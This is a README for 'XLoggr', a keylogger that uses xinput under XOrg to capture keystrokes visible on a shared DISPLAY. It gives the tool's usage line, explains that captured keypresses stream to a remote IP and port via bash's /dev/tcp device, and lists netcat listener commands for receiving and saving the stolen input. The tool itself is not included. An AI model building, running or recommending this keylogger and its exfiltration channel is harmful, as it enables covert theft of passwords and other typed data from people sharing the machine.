# XLoggr

An extremely basic keylogger program. This script exploits the way XOrg is setup by using xinput to find and test keyboard output. Due to the way XOrg handles input requests, these tests can be viewed by anyone with access to the same DISPLAY environment variable.

### Usage

```bash
./xloggr -a LOCAL_IP -p LOCAL_PORT
```

### Notes

An IP and port number are required in order to stream all output to the bash-specific device /dev/tcp/IP/PORT in order to monitor the keypresses locally. Please use a program such as netcat to capture this stream.

Example on localhost:
```
nc -lvp 1234
```

Example that captures output live and also saves to a file:
```
nc -lvp 1234 | tee output.txt
```